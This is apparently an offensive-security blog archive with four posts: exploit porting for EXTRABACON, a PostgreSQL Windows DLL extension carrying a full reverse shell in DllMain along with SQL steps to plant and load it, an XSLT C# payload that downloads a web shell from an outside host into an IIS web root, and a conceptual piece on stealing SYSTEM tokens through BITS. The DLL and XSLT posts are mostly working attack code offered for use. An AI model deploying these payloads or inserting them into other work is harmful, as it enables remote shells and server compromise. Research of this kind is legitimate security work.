By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

Future Work

The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Broker versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

Monday, June 20, 2016

Windows DLL to Shell PostgreSQL Servers

On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
#define PG_REVSHELL_CALLHOME_PORT "4444"

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <winsock2.h> 

#pragma comment(lib,"ws2_32")

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

#pragma warning(push)
#pragma warning(disable: 4996)
#define _WINSOCK_DEPRECATED_NO_WARNINGS

BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, 
                    _In_ DWORD fdwReason, 
                    _In_ LPVOID lpvReserved)
{
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM, 
                      IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host;
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr), 
             inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server), 
              NULL, NULL, NULL, NULL);

    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput = 
                            startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0, 
                  NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
}

#pragma warning(pop) /* re-enable 4996 */

/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

PG_FUNCTION_INFO_V1(add_one);

Datum dummy_function(PG_FUNCTION_ARGS)
{
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
}

Here is the convoluted process of exploitation:

postgres=# CREATE TABLE hextable (hex bytea);
postgres=# CREATE TABLE lodump (lo OID);


user@host:~/$ echo "INSERT INTO hextable (hex) VALUES 
              (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
user@host:~/$ psql -U postgres --host=localhost --file=sql.txt


postgres=# INSERT INTO lodump SELECT hex FROM hextable; 
postgres=# SELECT * FROM lodump;
  lo
-------
 16409
(1 row)
postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
           'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

Wednesday, May 25, 2016

XML Attack for C# Remote Code Execution

For whatever reason, Microsoft decided XML needed to be Turing complete. They created an XSL schema which allows for C# code execution in order to fill in the value of an XML element.

If an ASP.NET web application parses XML, it may be susceptible to this attack. If vulnerable, an attacker gains remote code execution on the web server. Crazy right? It is similar in exploitation as traditional XML Entity Expansion (XXE) attacks. Gaining direct code execution with traditional XXE requires extremely rare edge cases where certain protocols are supported by the server. This is more straight forward: supply whatever C# you want to run.

The payload in this example XML document downloads a web shell into the IIS web root. Of course, you can craft a more sophisticated payload, or perhaps just download and run some malware (such as msfvenom/meterpreter). In many cases of a successful exploitation, and depending on the application code, the application may echo out the final string "Exploit Success" in the HTTP response.

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx",
                       @"c:\inetpub\wwwroot\shell.aspx");

    return "Exploit Success";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>

Note: I've never gotten the "using" directive to work correctly, but have found the fully qualified namespaces of the classes (e.g. System.Net.WebClient) works fine.

This is kind of a hidden gem, it was hard to find good information about this.

Thanks to Martin Bajanik for finding this information: this attack is possible when XsltSettings.EnableScript is set to true, but it is false by default.

Wednesday, February 17, 2016

BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), or the NT AUTHORITY\SYSTEM (Local System) root-equivalent user.

BITS Manipulation is a pre-stage to modern privilege escalation attacks.

BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the prescence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has proved a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

Windows Tokens

Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

Token Impersonation Levels

A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token with the SecurityImpersonation or SecurityDelegation privilege.

Identification-Only Exploitation

There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:

Before MS15-050 Patch: The calling thread's Token is checked to see if it is run as SYSTEM, or LUID 999.

With the background information above, the bug is easy to spot. Here is the same code after the patch:

After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.

It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only of the SecurityIdentification privilege. There are countless token access control vulnerabilities already discovered, and more likely to be found.

BITS Manipulation Methodology

BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.

Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

Here is the general methodology, which can be performed as a non-Administrator user on the machine:

Create a BITS server with a local context.
Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
Capture SYSTEM's token when it interacts with the server.

BITS Manipulation Implementation

BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral object-oriented binary-interface which is an arguable precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer familiar with the aforementioned methodology, BITS documentation, and experience using COM.

There is an already-written implementation that is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts, uncredited but likely written by James Forshaw of Google's Project Zero.

Subscribe to: Posts ( Atom )